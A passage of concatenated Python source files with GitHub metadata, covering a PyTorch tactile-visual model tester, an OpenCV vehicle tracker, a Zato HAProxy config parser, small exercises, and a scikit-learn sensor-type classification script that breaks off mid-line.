batch_features[0] = torch.cat((batch_features[0], torch.zeros(self.features[\"batch_size\"] - batch_features[0].shape[0], self.features[\"n_eval\"], int(self.features[\"state_action_size\"] / 2))), dim=0)\n\n \n mae, kld, mae_tactile, predictions = 100, 100, 100, 100\n tactile_predictions, tactile = 100, 100\n if self.features[\"model_name\"] == \"SVG\" or self.features[\"model_name\"] == \"SVG_MMFM\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n mae, kld, predictions = self.model.run(scene=images, actions=action, test=test)\n\n elif self.features[\"model_name\"] == \"SVTG_SE\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = batch_features[2].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n scene_and_touch = torch.cat((tactile, images), 2)\n mae, kld, predictions = self.model.run(scene_and_touch=scene_and_touch, actions=action, test=test)\n predictions = predictions[:,:,3:6,:,:]\n tactile_predictions = predictions[:,:,0:3,:,:]\n\n elif self.features[\"model_name\"] == \"SPOTS_SVG_ACTP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\":\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = torch.flatten(batch_features[2].permute(1, 0, 2, 3), start_dim=2).to(self.features[\"device\"])\n mae, kld, mae_tactile, predictions, tactile_predictions = self.model.run(scene=images, tactile=tactile, actions=action, gain=0, test=test, stage=\"\")\n\n elif self.features[\"model_name\"] == \"SVG_TE\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = torch.flatten(batch_features[2].permute(1, 0, 2, 3), start_dim=2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n mae, kld, predictions = self.model.run(scene=images, tactile=tactile, actions=action, gain=0, test=test)\n\n if cut_required:\n predictions = predictions[:, :cut_required]\n images = images[:,:cut_required]\n if self.features[\"model_name\"] == \"SPOTS_SVG_ACTP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\":\n tactile = tactile[:cut_required]\n if self.features[\"model_name\"] == \"SVTG_SE\":\n tactile = tactile[:cut_required]\n\n return images, predictions, tactile, tactile_predictions\n\n\n@click.command()\n@click.option('--model_name', type=click.Path(), default = \"SVG\", help='Set name for prediction model, SVG, SVTG_SE, SVG_TC, SVG_TC_TE, SPOTS_SVG_ACTP')\n@click.option('--model_stage', type=click.Path(), default = \"\", help='what stage of model should you test? BEST, stage1 etc.')\n@click.option('--tactile_random', type=click.BOOL, default = False, help='if you want to provide random tactile data to the model instead of real tactile data')\n@click.option('--tactile_zero', type=click.BOOL, default = False, help='if you want to provide random tactile data to the model instead of real tactile data')\n@click.option('--image_zero', type=click.BOOL, default = False, help='if you want to provide neutral image data to the model instead of the real image data')\n@click.option('--image_random', type=click.BOOL, default = False, help='if you want to provide random scene data to the model instead of real scene data')\n@click.option('--model_folder_name', type=click.Path(), default = \"/home/willow/Robotics/SPOTS/models/saved_models/SVG/marked_object_dataset/model_12_11_2022_17_18/\", help='Folder name where the model is stored')\n@click.option('--quant_analysis', type=click.BOOL, default = True, help='Perform quantitative analysis on the test data')\n@click.option('--qual_analysis', type=click.BOOL, default = False, help='Perform qualitative analysis on the test data')\n@click.option('--qual_tactile_analysis', type=click.BOOL, default = False, help='Perform qualitative analysis on the test tactile data')\n@click.option('--quant_tactile_analysis', type=click.BOOL, default = False, help='Perform quantitative analysis on the test tactile data')\n@click.option('--test_sample_time_step', type=click.Path(), default = \"[1, 2, 10]\", help='which time steps in prediciton sequence to calculate performance metrics for.')\n@click.option('--model_name_save_appendix', type=click.Path(), default = \"\", help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--test_data_dir', type=click.Path(), default = \"/home/willow/Robotics/datasets/PRI/MarkedHeavyBox/Dataset_2c_15p/\", help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--scaler_dir', type=click.Path(), default = \"/home/willow/Robotics/datasets/PRI/MarkedHeavyBox/Dataset_2c_5p/scalar/\", help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--using_tactile_images', type=click.BOOL, default = False, help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--using_depth_data', type=click.BOOL, default = False, help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--seen', type=click.BOOL, default = False, help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--device', type=click.Path(), default = \"cuda:1\", help = \"What to add to the save file to identify the model as a specific subset, _1c\")\ndef main(model_name, model_stage, tactile_random, tactile_zero, image_zero, image_random, model_folder_name, quant_analysis, qual_analysis, qual_tactile_analysis, quant_tactile_analysis, test_sample_time_step, model_name_save_appendix, test_data_dir, scaler_dir, using_tactile_images, using_depth_data, seen, device):\n model_save_path = model_folder_name\n test_data_dir = test_data_dir\n scaler_dir = scaler_dir\n if tactile_random:\n data_save_path = model_save_path + \"performance_data_tactile_random/\"\n elif image_random:\n data_save_path = model_save_path + \"performance_data_image_random/\"\n elif image_zero:\n data_save_path = model_save_path + \"performance_data_image_zero_17/\"\n elif tactile_zero:\n data_save_path = model_save_path + \"performance_data_tactile_zero_17/\"\n else:\n data_save_path = model_save_path + \"performance_data_17/\"\n\n model_save_name = model_name + \"_model\"\n\n if \"household_object_dataset\" in test_data_dir:\n if seen:\n test_data_dir += \"test_seen_formatted/\"\n else:\n test_data_dir += \"test_unseen_formatted/\"\n elif \"MarkedHeavyBox\" in test_data_dir:\n if seen:\n test_data_dir += \"test_formatted/\"\n else:\n test_data_dir += \"test_examples_formatted/\"\n\n try:\n os.mkdir(data_save_path)\n except FileExistsError or FileNotFoundError:\n pass\n\n print(model_save_name)\n\n global tz\n global tr\n global data_map\n global tdd\n global uti\n global udd\n global ir\n global iz\n data_map = []\n tdd = test_data_dir\n uti = using_tactile_images\n udd = using_depth_data\n tr = tactile_random\n tz = tactile_zero\n ir = image_random\n iz = image_zero\n\n with open(test_data_dir + 'map.csv', 'r') as f: # rb\n reader = csv.reader(f)\n for index, row in enumerate(reader):\n data_map.append(row)\n\n features = {\"model_name\":model_name, \"model_stage\":model_stage, \"model_folder_name\":model_folder_name,\n \"quant_analysis\":quant_analysis, \"qual_analysis\":qual_analysis, \"model_save_name\":model_save_name,\n \"qual_tactile_analysis\":qual_tactile_analysis, \"quant_tactile_analysis\":quant_tactile_analysis, \"test_sample_time_step\":test_sample_time_step,\n \"model_name_save_appendix\":model_name_save_appendix, \"test_data_dir\":test_data_dir, \"scaler_dir\":scaler_dir,\n \"using_tactile_images\":using_tactile_images, \"using_depth_data\":using_depth_data, \"model_save_path\":model_save_path,\n \"data_save_path\": data_save_path, \"seen\": seen, \"device\": device, \"tactile_random\": tactile_random, \n \"image_random\": image_random, \"image_zero\": image_zero}\n\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n # device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\") # use gpu if available\n\n MT = UniversalTester(features)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n main()\n","repo_name":"WillMandil001/inverted_pendulum","sub_path":"models/model_tester.py","file_name":"model_tester.py","file_ext":"py","file_size_in_byte":26403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40935842884","text":"import cv2\nfrom tracker import *\n\ncapt = cv2.VideoCapture(\"rodovia.mp4\")\n\ntracker = EuclideanDistTracker()\n\n# Encontrar objetos se movendo em fundo estatico\n\nencontrar_objeto = cv2.createBackgroundSubtractorMOG2(history=100, varThreshold=40)\nwhile True:\n ret, quad = capt.read()\n height, width, _ = quad.shape\n\n # Mostrar apenas a area de interesse\n\n roi = quad[200: 700,500: 1000]\n\n mascara = encontrar_objeto.apply(roi)\n _, mascara = cv2.threshold(mascara, 254, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(mascara, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n detections = []\n for cnt in contours:\n # Calcular a area e retirar objetos indesejaveis\n area = cv2.contourArea(cnt)\n if area > 100:\n #cv2.drawContours(roi, [cnt], -1, (0, 255, 0), 2)\n x, y, w, h = cv2.boundingRect(cnt)\n\n\n detections.append([x, y, w, h])\n\n# Rastreamento do objeto\n\n caixas_ids = tracker.update(detections)\n for caixas_ids in caixas_ids:\n x, y, w, h, id = caixas_ids\n cv2.putText(roi, str(id), (x, y-15), cv2.FONT_HERSHEY_PLAIN, 2, (255, 0, 0), 2)\n cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n cv2.imshow(\"roi\", roi)\n cv2.imshow(\"Quadro\", quad)\n cv2.imshow(\"Mascara\", mascara)\n\n key = cv2.waitKey(30)\n if key == 27:\n break\n\ncapt.release()\ncv2.destroyAllWindows()\n\n","repo_name":"julioskimo/APS-6-Semestre---Processamento-de-Imagens","sub_path":"APS Object Detection and Tracking/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27948525493","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\n# stdlib\nfrom logging import getLogger\nfrom tempfile import NamedTemporaryFile\nfrom traceback import format_exc\n\n# Zato\nfrom zato.common.util.api import make_repr, timeouting_popen\nfrom zato.common.util.open_ import open_r\n\nlogger = getLogger(__name__)\n\n# We'll wait up to that many seconds for HAProxy to validate the config file.\nHAPROXY_VALIDATE_TIMEOUT = 0.6\n\n# Statistics commands understood by HAproxy 1.3.x and newer. Note that the\n# command numbers must be consecutively increasing across HAProxy versions.\nhaproxy_stats = {\n ('1', '3'): {\n\n # A special command interpreted by the agent as a request for\n # describing the commands available\n 0: ('ZATO_DESCRIBE_COMMANDS', 'Describe commands'),\n\n 1: ('show info', 'Show info'),\n 2: ('show stat', 'Show stats'),\n 3: ('show errors', 'Show errors'),\n 4: ('show sess', 'Show sessions'),\n },\n ('1', '4'): {\n }\n}\n\n# timeout_id -> name, value in milliseconds\ntimeouts = {\n 1: (250, '250ms'),\n 2: (500, '500ms'),\n 3: (1000, '1s'),\n 4: (3000, '3s'),\n 5: (5000, '10s'),\n 6: (30000, '30s')\n}\n\nhttp_log = {\n 1: ('nolog', 'No log'),\n 2: ('httplog', 'HTTP log'),\n}\n\ntcp_log = {\n 1: ('nolog', 'No log'),\n 2: ('tcplog', 'TCP log'),\n}\n\nreversed_http_log = {v[0]: k for k, v in http_log.items()}\nreversed_tcp_log = {v[0]: k for k, v in tcp_log.items()}\n\nclass Config:\n \"\"\" An object for representing a HAProxy configuration file.\n \"\"\"\n def __init__(self):\n self.global_ = {}\n self.defaults = {}\n self.backend = {'bck_http_plain': {}}\n self.frontend = {'front_http_plain': {}}\n\n def __repr__(self):\n return make_repr(self)\n\n def set_value(self, name, data):\n if name == 'global:log':\n host, port, facility, level = data\n self.global_['log'] = {}\n self.global_['log']['host'] = host\n self.global_['log']['port'] = port\n self.global_['log']['facility'] = facility\n self.global_['log']['level'] = level\n elif name == 'global:stats_socket':\n stats_socket = data[0]\n self.global_['stats_socket'] = stats_socket\n elif name == 'defaults:timeout connect':\n timeout = data[0]\n self.defaults['timeout_connect'] = timeout\n elif name == 'defaults:timeout client':\n timeout = data[0]\n self.defaults['timeout_client'] = timeout\n elif name == 'defaults:timeout server':\n timeout = data[0]\n self.defaults['timeout_server'] = timeout\n elif name == 'defaults:stats uri':\n stats_uri = data[0]\n self.defaults['stats_uri'] = stats_uri\n elif name.startswith('backend bck_http_plain:server'):\n backend_name, address, port, extra = data\n extra = extra.strip()\n backend_name = backend_name.split('http_plain--')[1]\n self.backend['bck_http_plain'][backend_name] = {}\n self.backend['bck_http_plain'][backend_name]['address'] = address\n self.backend['bck_http_plain'][backend_name]['port'] = port\n self.backend['bck_http_plain'][backend_name]['extra'] = extra\n elif name == 'backend bck_http_plain:option httpchk':\n method, path = data\n self.backend['bck_http_plain']['option_httpchk'] = {}\n self.backend['bck_http_plain']['option_httpchk']['method'] = method\n self.backend['bck_http_plain']['option_httpchk']['path'] = path\n elif name == 'frontend front_http_plain:monitor-uri':\n path = data[0]\n self.frontend['front_http_plain']['monitor_uri'] = path\n elif name == 'frontend front_http_plain:option log-http-requests':\n option = reversed_http_log[data[0]]\n self.frontend['front_http_plain']['log_http_requests'] = option\n elif name == 'frontend front_http_plain:bind':\n address, port = data\n self.frontend['front_http_plain']['bind'] = {}\n self.frontend['front_http_plain']['bind']['address'] = address\n self.frontend['front_http_plain']['bind']['port'] = port\n elif name == 'frontend front_http_plain:maxconn':\n maxconn = data[0]\n self.frontend['front_http_plain']['maxconn'] = maxconn\n else:\n msg = 'Could not parse config, name:[{name}], data:[{data}]'.format(name=name, data=data)\n logger.error(msg)\n raise Exception(msg)\n\ndef validate_haproxy_config(config_data, haproxy_command):\n \"\"\" Writes the config into a temporary file and validates it using the HAProxy's\n -c check mode.\n \"\"\"\n try:\n with NamedTemporaryFile(prefix='zato-tmp') as tf:\n\n tf.write(config_data.encode('utf8'))\n tf.flush()\n\n common_msg = 'config_file:`{}`'\n common_msg = common_msg.format(open_r(tf.name).read())\n\n timeout_msg = 'HAProxy didn\\'t respond in `{}` seconds. '\n rc_non_zero_msg = 'Failed to validate the config file using HAProxy. '\n\n command = [haproxy_command, '-c', '-f', tf.name]\n timeouting_popen(command, HAPROXY_VALIDATE_TIMEOUT, timeout_msg, rc_non_zero_msg, common_msg)\n\n except Exception:\n msg = 'Caught an exception, e:`{}`'.format(format_exc())\n logger.error(msg)\n raise Exception(msg)\n","repo_name":"zatosource/zato","sub_path":"code/zato-common/src/zato/common/haproxy.py","file_name":"haproxy.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":1047,"dataset":"github-code","pt":"47"} +{"seq_id":"14632587020","text":"#! /usr/bin/env python\n\n\ndef make_change(change=0, coins=[]):\n \"\"\" \n dynamic programming algorithm computing\n number of ways to make change from specified coins\n \n \"\"\"\n\n # sets combos[0] = 1\n combos = [1] + [ 0 for x in range(1,change+1) ]\n\n for val in coins:\n for amount in range(1,change+1):\n print(combos)\n if amount >= val:\n combos[amount] += combos[amount-val]\n print(\"\")\n\n print(combos)\n \n return combos[change]\n\n\n\n\ndef main():\n coins = [1,2,5]\n change = 12\n\n print(make_change(change, coins))\n\nif __name__ == '__main__':\n main()\n","repo_name":"mccannj9/PyMiscComputing","sub_path":"CoinChange.py","file_name":"CoinChange.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40425127558","text":"from django.contrib import admin\nfrom .models import Project\n\n\n# Register your models here.\nclass ProjectAdmin(admin.ModelAdmin):\n\n def save_model(self, request, obj, form, change):\n super().save_model(request, obj, form, change)\n if obj not in list(request.user.projects.all()):\n request.user.projects.add(obj)\n request.user.save()\n\n filter_horizontal = ('tags', 'users')\n\n\nadmin.site.register(Project, ProjectAdmin)\n","repo_name":"Foxugly/django_timesheets","sub_path":"project/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22181813719","text":"class Ultraman:\n\n def __init__(self,name,in_hp,in_attack,in_defense):\n self.name = name\n self.hp = in_hp\n self.attack_power = in_attack\n self.defense_power = in_defense\n \n def attack(self, enemy):\n print(self.name, 'is attacking', enemy.name)\n enemy.attacked(self, self.attack_power)\n\n def attacked(self, enemy, attack_power_enemy): \n print(self.name, 'is attacked by',enemy.name)\n get_attack = attack_power_enemy/self.defense_power\n self.hp -= get_attack \n print('Get attact:', str(get_attack)) \n print(self.name, 'has hp:', self.hp,'\\n')\n\nNexus = Ultraman('Nexus',150,80,50)\nGaia = Ultraman('Gaia',145,85,40)\nZero = Ultraman('Zero',155,70,40)\n\n# Nexus.attack(Gaia)\nwhile Gaia.hp > 0 or Nexus.hp >0:\n Gaia.attack(Nexus)\n Nexus.attack(Gaia)\nif Nexus.hp > Gaia.hp:\n print('Nexus is win')\nelse:\n print('Gaia is win')\n\n","repo_name":"susastra-gunawan/Python-3-Essential-","sub_path":"2. Object-Oriented Python/5. OOP Exercise/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72609349582","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n#question no 8\n\nlist=[9,5,7,8,5]\nnew_list=[]\nj=0\nfor i in range(0,len(list)):\n j+=list[i]\n new_list.append(j)\nprint(new_list)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"kauthamvetrivel/python-test","sub_path":"Untitled10.py","file_name":"Untitled10.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"17807534846","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom IQR_outliers import IQR\r\nfrom sklearn.ensemble import HistGradientBoostingClassifier, RandomForestClassifier, GradientBoostingClassifier, GradientBoostingRegressor\r\nfrom sklearn.ensemble import VotingClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.multiclass import OneVsOneClassifier, OneVsRestClassifier\r\nfrom sklearn import tree\r\nfrom pyts.classification import TimeSeriesForest\r\n\r\n\r\n\r\nclass multiple():\r\n\r\n def __init__(self): \r\n self.iqr = IQR() \r\n g1 = ['Outside_Air_Temperature_Sensor']\r\n g2 = ['Chilled_Water_Return_Temperature_Sensor', 'Chilled_Water_Supply_Temperature_Sensor', 'Hot_Water_Supply_Temperature_Sensor', 'Preheat_Supply_Air_Temperature_Sensor', 'Return_Air_Temperature_Sensor', 'Return_Water_Temperature_Sensor', 'Supply_Air_Temperature_Sensor']\r\n g3 = ['Cooling_Valve', 'Reheat_Valve', 'Valve']\r\n g4 = ['Differential_Pressure_Sensor']\r\n g5 = ['Discharge_Air_Static_Pressure_Sensor', 'Supply_Air_Static_Pressure_Sensor', ]\r\n g6 = ['Heat_Exchanger', 'Variable_Frequency_Drive']\r\n g7 = ['Return_Fan', 'Supply_Fan']\r\n g8 = ['Power_Sensor']\r\n g9 = ['Pump']\r\n g10 = ['Energy_Sensor']\r\n \r\n self.groupings = [g1, g2, g3, g4, g5, g6, g7, g8, g9, g10]\r\n\r\n\r\n def read_features_from_file(self, filename, outliers, inv_features= [], short_files=[]):\r\n print(\"reading from file\")\r\n feature_dict = {}\r\n file_dict = {}\r\n f = open(filename, \"r\", encoding=\"UTF-8\")\r\n invalid_features = inv_features\r\n c = 0\r\n for line in f:\r\n c += 1\r\n line = line.strip()\r\n line = line.replace(\"&\", \" \")\r\n line = line.replace(\"//\", \"/\")\r\n line = line.replace(\", \", \"-\") #Makes sure we do not split within feature names (some have spaces)\r\n line = line.split(\" \")\r\n sensor = line[0].split(\"/\")[3].strip()\r\n if line[0].strip() in outliers or line[0].strip() in short_files: #Skips sensor if it is not relevant\r\n #print(f\"skipped sensor: {line[0].strip()}\")\r\n continue\r\n \r\n for i in range(len(self.groupings)):\r\n if sensor in self.groupings[i]:\r\n sensor = i\r\n \r\n if sensor not in feature_dict: #If sensor is not already a key in the dictionary\r\n feature_dict[sensor] = []\r\n file_dict[sensor] = [] \r\n sensor_features = {}\r\n\r\n file_dict[sensor].append(line[0])\r\n \r\n for i in range(1, len(line)-1, 2):\r\n \r\n #if line[i+1] == \"nan\" and line[i] not in invalid_features:\r\n if line[i+1] == \"nan\":\r\n sensor_features[line[i]] = 1.0\r\n invalid_features.append(line[i])\r\n elif line[i+1] == \"inf\":\r\n sensor_features[line[i]] = 100000.0\r\n else: \r\n sensor_features[line[i]] = float(line[i+1])\r\n \r\n feature_dict[sensor].append(sensor_features)\r\n #feature_dict = self.remove_invalid_values(feature_dict, list(set(invalid_features)))\r\n print(f\"num_files: {c}\")\r\n return feature_dict, invalid_features, file_dict\r\n\r\n\r\n def remove_invalid_values(self, dict, invalid_list):\r\n print(\"removing invalid features\")\r\n #print(f\"invalid_list: {invalid_list}\")\r\n for invalid_feature in invalid_list:\r\n for sensor in dict:\r\n for el in dict[sensor]:\r\n el.pop(invalid_feature, None)\r\n return dict\r\n \r\n def dict_to_arrays(self, feature_dict, file_dict):\r\n features = [] #2d array\r\n target = [] #1d array that holds the corresponding classes\r\n file_list = []\r\n num = 0\r\n\r\n for sensor in feature_dict:\r\n\r\n for i in range(len(feature_dict[sensor])):\r\n tmp_lst = []\r\n file_list.append(file_dict[sensor][i])\r\n\r\n for feature in feature_dict[sensor][i]:\r\n tmp_lst.append(feature_dict[sensor][i][feature])\r\n features.append(tmp_lst)\r\n target.append(sensor)\r\n \r\n return np.array(features), np.array(target), np.array(file_list)\r\n \r\n def read_short_files(self, filepath):\r\n short_files = []\r\n f = open(filepath, \"r\")\r\n for line in f:\r\n short_files.append(line.strip())\r\n return short_files\r\n \r\n def get_data(self):\r\n\r\n #train_features, train_inv, train_file_dict = self.read_features_from_file(\"comprehensive_features_10m_train.txt\", [], short_files=[])\r\n #test_features, test_inv, test_file_dict = self.read_features_from_file(\"comprehensive_features_10m_test.txt\", [], inv_features=train_inv, short_files=[])\r\n #total_invalid = train_inv + test_inv\r\n total_invalid = []\r\n \r\n outliers = []\r\n for i in range(len(self.groupings)): #Find outliers in each grouping\r\n tmp = self.iqr.return_outliers(self.groupings[i], [])\r\n outliers = outliers + tmp \r\n print(f\"len(outliers): {len(outliers)}\")\r\n \r\n \r\n\r\n train_features, train_inv, train_file_dict = self.read_features_from_file(\"comprehensive_features_10m_train.txt\", outliers, inv_features=total_invalid, short_files=[])\r\n train_features, train_target, train_file_list = self.dict_to_arrays(train_features, train_file_dict)\r\n\r\n test_features, test_inv, test_file_dict = self.read_features_from_file(\"comprehensive_features_10m_test.txt\", [], inv_features=total_invalid, short_files=[])\r\n test_features, test_target, test_file_list = self.dict_to_arrays(test_features, test_file_dict)\r\n\r\n return train_features, train_target, test_features, test_target, train_file_list, test_file_list\r\n\r\n def organize_results(self, predicted_answers, target):\r\n results = {}\r\n other = []\r\n for i in range(len(self.groupings)):\r\n print(self.groupings[i])\r\n correct = 0\r\n wrong = 0\r\n other_suggestions = {}\r\n for j in range(len(predicted_answers)):\r\n if target[j] == i:\r\n if predicted_answers[j] == target[j]:\r\n correct += 1\r\n else:\r\n wrong += 1\r\n if predicted_answers[j] not in other_suggestions:\r\n other_suggestions[predicted_answers[j]] = 1\r\n else:\r\n other_suggestions[predicted_answers[j]] += 1\r\n results[i] = [correct, wrong]\r\n other.append(other_suggestions)\r\n print(f\"correct: {correct}\")\r\n print(f\"wrong: {wrong}\")\r\n print(f\"other_suggestions: {other_suggestions}\")\r\n for sensor in results:\r\n print(f\"{sensor}: correct: {results[sensor][0]}, wrong: {results[sensor][1]}\")\r\n print(f\"other suggestions: {other[sensor]}\")\r\n #print(f\"results: {results}\")\r\n #print(f\"other: {other}\")\r\n return results, other\r\n \r\n\r\n def histogram_classifier(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = HistGradientBoostingClassifier(max_iter=1000, verbose=10, random_state=0, learning_rate=0.02, early_stopping=False) #0.8734602463605823 with learning rate = 0.1 and 10k estimatorrs, 0.8913773796192609 with learning rate 0.05 and estimators 10k, 0.9171332586786114 with 0.2 learning rate and 10k estimators,???? with learning rate 0.1 and estimators = 10k\r\n clf.fit(train_feat, train_targ)\r\n print(\"Histogram score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def random_forest(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = RandomForestClassifier(n_estimators=400, max_depth=16, random_state=0, verbose=10) #Managed 0.880552444 with 400 estimators and max_depth=16, 0.882045 for estimators = 10 000\r\n clf.fit(train_feat, train_targ)\r\n print(\"random forest score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def neaural_network(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = MLPClassifier(learning_rate_init=0.1, hidden_layer_sizes=(1,5), random_state=0, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(\"MLP classifier score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def k_neighbours(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = KNeighborsClassifier(n_neighbors=5, weights=\"distance\") #0.712952 for n_neighbours=3, works slightly better without outliers, 0.703994027622247 for n_neighbours = 3\r\n clf.fit(train_feat, train_targ)\r\n print(\"Kneighbors score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def decision_tree(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = tree.DecisionTreeClassifier(max_depth=12, random_state=0)\r\n clf.fit(train_feat, train_targ)\r\n\r\n #sensor_names = ['G0', 'G1', 'G2', 'G3', 'G4', 'G5', 'G6', 'G7', 'G8', 'G9']\r\n #tree.plot_tree(clf, fontsize=8, class_names=sensor_names, max_depth=2)\r\n #plt.show()\r\n print(\"Decision tree score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n \r\n def gradient_boost(self, train_feat, train_targ, test_feat, test_targ, random_state=0):\r\n clf = GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, random_state=random_state, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(\"Gradient boost score:\")\r\n s = clf.score(test_feat, test_targ)\r\n print(s)\r\n ans = clf.predict(test_feat)\r\n return ans\r\n\r\n \r\n def oneVsOne_classifier(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = OneVsOneClassifier(GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10)) #0.8857782 for estimators = 200, 0.8872713 for estimators = 400\r\n #clf = OneVsOneClassifier(GradientBoostingClassifier(n_estimators=4, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10))\r\n clf.fit(train_feat, train_targ)\r\n print(\"One vs One score:\")\r\n print(clf.score(test_feat, test_targ))\r\n return clf\r\n \r\n def oneVsRest_classifier(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = OneVsRestClassifier(GradientBoostingClassifier(n_estimators=400, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10)) #Estimators = 200, score: 0.9033221; estimators=400, score= 0.9081746920492721\r\n #clf = OneVsRestClassifier(GradientBoostingClassifier(n_estimators=4, learning_rate=0.1, max_depth=6, max_features=1000, random_state=0, verbose=10))\r\n clf.fit(train_feat, train_targ)\r\n print(\"One vs rest score:\")\r\n print(clf.score(test_feat, test_targ))\r\n ans = clf.predict(test_feat)\r\n return ans\r\n\r\n def gradient_regressor(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = GradientBoostingRegressor(n_estimators=400, learning_rate=0.1, max_depth=6, random_state=0, verbose=10)\r\n clf.fit(train_feat, train_targ)\r\n print(f\"Gradient boost score: {clf.score(test_feat, test_targ)}\")\r\n return\r\n\r\n def normalize(self, features):\r\n #A function that normalize all features to values between -1 and 1, maybe it has an effect\r\n pass\r\n\r\n def time_series_forest(self, train_feat, train_targ, test_feat, test_targ):\r\n clf = TimeSeriesForest(random_state=0, n_windows=3, max_depth=16, max_features='sqrt', n_estimators=10000)\r\n clf.fit(train_feat, train_targ)\r\n print(f\"score: {clf.score(test_feat, test_targ)}\")\r\n\r\n\r\n def find_common_invalid_feat(self, invalid_list):\r\n common_invalid = {}\r\n for i in range(10): #Check for each sensor\r\n tmp = []\r\n common_invalid[i] = []\r\n count = 0\r\n for invalid_dict in invalid_list: #We want to check all invalid sensors for a given key, and return the intersection of these\r\n try:\r\n if i not in invalid_dict:\r\n continue\r\n elif len(tmp) == 0:\r\n tmp = invalid_dict[i]\r\n else:\r\n set(tmp).intersection(invalid_dict[i])\r\n count += 1 \r\n except:\r\n continue\r\n if count != 0: #Verify that we did an intersection between at least to lists\r\n common_invalid[i] = tmp\r\n for key in common_invalid:\r\n print(f\"sensor: {key}\")\r\n print(f\"common_invalid: {common_invalid[key]}\")\r\n\r\n f = open(\"common_invalid_10m.txt\", \"w\", encoding=\"UTF-8\")\r\n f.write(str(common_invalid))\r\n f.close()\r\n\r\n #tmp = set(tmp).intersection(tmp_dict[el][i])\r\n\r\n\r\n def find_invalid_files(self, ans, target, file_list):\r\n invalid = {}\r\n for i in range(10):\r\n invalid[i] = [] #Initiate the dict with each sensor group\r\n\r\n for i in range(len(ans)):\r\n if ans[i] != target[i]:\r\n invalid[target[i]].append((file_list[i], ans[i]))\r\n for el in invalid:\r\n print(f\"sensor: {el}\")\r\n print(f\"invalid sensors: {invalid[el]}\")\r\n return invalid\r\n\r\nif __name__ == \"__main__\":\r\n classifier = multiple()\r\n train_feat, train_targ, test_feat, test_targ, train_file_list, test_file_list = classifier.get_data()\r\n \r\n #kneigh_ans = classifier.k_neighbours(train_feat, train_targ, test_feat, 